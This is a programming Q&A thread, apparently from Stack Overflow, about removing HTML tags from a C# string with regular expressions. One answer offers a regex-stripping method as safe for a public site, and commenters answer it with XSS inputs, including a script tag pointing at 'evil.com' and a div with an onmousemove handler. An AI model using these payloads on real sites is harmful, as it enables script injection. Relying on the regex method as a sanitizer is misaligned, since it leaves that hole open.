tags:

views:

173

answers:

4

I am using the following Regular Expresion to remove html tags from a string. It works except I leave the closing tag. If I attempt to remove: <a href="blah">blah</a> it leaves the <a/>.

I do not know Regular Expression syntax at all and fumbled through this. Can someone with RegEx knowledge please provide me with a pattern that will work.

Here is my code:

  string sPattern = @"<\/?!?(img|a)[^>]*>";
  Regex rgx = new Regex(sPattern);
  Match m = rgx.Match(sSummary);
  string sResult = "";
  if (m.Success)
   sResult = rgx.Replace(sSummary, "", 1);

I am looking to remove the first occurence of the <a> and <img> tags.

+9  A: 

Using a regular expression to parse HTML is fraught with pitfalls. HTML is not a regular language and hence can't be 100% correctly parsed with a regex. This is just one of many problems you will run into. The best approach is to use an HTML / XML parser to do this for you.

Here is a link to a blog post I wrote awhile back which goes into more details about this problem.

That being said, here's a solution that should fix this particular problem. It in no way is a perfect solution though.

var pattern = @"<(img|a)[^>]*>(?<content>[^<]*)<";
var regex = new Regex(pattern);
var m = regex.Match(sSummary);
if ( m.Success ) { 
  sResult = m.Groups["content"].Value;
JaredPar
@downvoter, explanation?
JaredPar
Jared, this seems to throw an exception when I try it. Also, will this remove the text between the tags? I essentially want to remove the first occurence of the a, p and img tags from the string.
Tony
@Tony, fixed a bug in the regex. Should compile now
JaredPar
Thank you, i'll check it out.
Tony
+1  A: 

So the HTML parser everyone's talking about: http://htmlagilitypack.codeplex.com/

If it's clean XHTML, you can also use System.Xml.Linq.XDocument or System.Xml.XmlDocument.

Rei Miyasaka
A: 

Here's an extension method I created using a simple regular expression to remove HTML tags from a string:

/// <summary>
/// Converts an Html string to plain text, and replaces all br tags with line breaks.
/// </summary>
/// <returns></returns>
/// <remarks></remarks>
[Extension()]
public string ToPlainText(string s)
{

    s = s.Replace("<br>", Constants.vbCrLf);
    s = s.Replace("<br />", Constants.vbCrLf);
    s = s.Replace("<br/>", Constants.vbCrLf);


    s = Regex.Replace(s, "<[^>]*>", string.Empty);


    return s;
}

Hope that helps.

Breakskater
There's more than just <br> that ends with a slash; in fact, technically, any element can end with a slash -- and it might not necessarily be with one or no spaces following it or trailing it. This is also valid: `<p / >`
Rei Miyasaka
Those lines are just there to preserve line breaks, if needed. Otherwise, they may be removed.
Breakskater
Nice, where are you using this ? on a public web site ? entering '<script src="http://evil.com/evil.js" ' (notice no ">" character) is enough to exploit it :D
VirtualBlackFox
Rei, it will remove <p / > You haven't even tested it
Breakskater
VirtualBlackFox, yes I am using it on a Public web site, and quite effectively. '<script src="http://evil.com/evil.js" ' is malformed and will not run, so that is a moot point.
Breakskater
A bit off topic, but are you really using the `Microsoft.VisualBasic.Constants` class in C#? You should use `System.Environment.NewLine` instead of `Microsoft.VisualBasic.Constants.vbCrLf`, in both C# and VB. Or if you insist on using a platform dependant constant, use `"\r\n"`, which is much shorter. In any case, the whole `Microsoft.VisualBasic` namespace/assembly is basically one big crutch that is best avoided.
Allon Guralnek
Also, in C#, to define an extension method you simply put the keyword `this` before the definition of the first parameter (e.g. `... ToPlainText(this string s)`), and then you can omit the `[Extension()]` attribute. Even if you did use the attribute, when specifying an attribute that has an empty argument list, you can omit the parentheses (e.g. `[Extension]`).
Allon Guralnek
Yes that's a totally moot point... ok to celebrate the week of the great twitter worm, a working sample twitter style ------> <div style="position:absolute; left:0; top:0; width:10000; height:10000;" onmousemove="window.alert('I can haz xss cheezburger');"
VirtualBlackFox
+1  A: 

You can use already existing libraries to strip off the html tags. One good one being Chilkat C# Library.

A_Var
This is all well and good, but I not onlyneed to remove the tag, I need to remove everything between the tags.
Tony